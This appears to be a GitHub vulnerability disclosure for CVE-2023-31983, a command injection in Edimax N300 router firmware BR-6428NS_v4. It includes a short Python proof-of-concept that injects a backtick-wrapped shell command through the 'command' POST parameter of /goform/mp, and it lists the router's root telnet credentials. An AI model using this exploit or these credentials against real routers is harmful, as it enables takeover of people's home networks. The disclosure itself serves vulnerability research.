Headline
CVE-2023-31983: CVE/Readme.md at main · Erebua/CVE
A Command Injection vulnerability in Edimax Wireless Router N300 Firmware BR-6428NS_v4 allows attacker to execute arbitrary code via the mp function in /bin/webs without any limitations.
Permalink
Cannot retrieve contributors at this time
Command Injection
Command injection without any limitations
Firmware
Wireless: Edimax home Wireless Routers N300
Firmware Version: BR-6428NS_v4_1.10
You can download Firmware at this website and use FirmAE to simulate the router environment.
FirmAE command: ./run.sh -r v4 BR-6428NS_v4_1.10.bin(This will take a while, please be patient:)
Description
The vulnerability was found in /bin/webs.
Function is mp
The post parameter command will be sprintf as $0 which will be executed
poc
python
import requests
command = “touch /tmp/Swe3ty2”
url = “http://192.168.2.1/goform/mp” data = { “command":"`"+command+"`” }
r = requests.post(url,data=data) print(r.text)
use root/edimaxens telnet to the router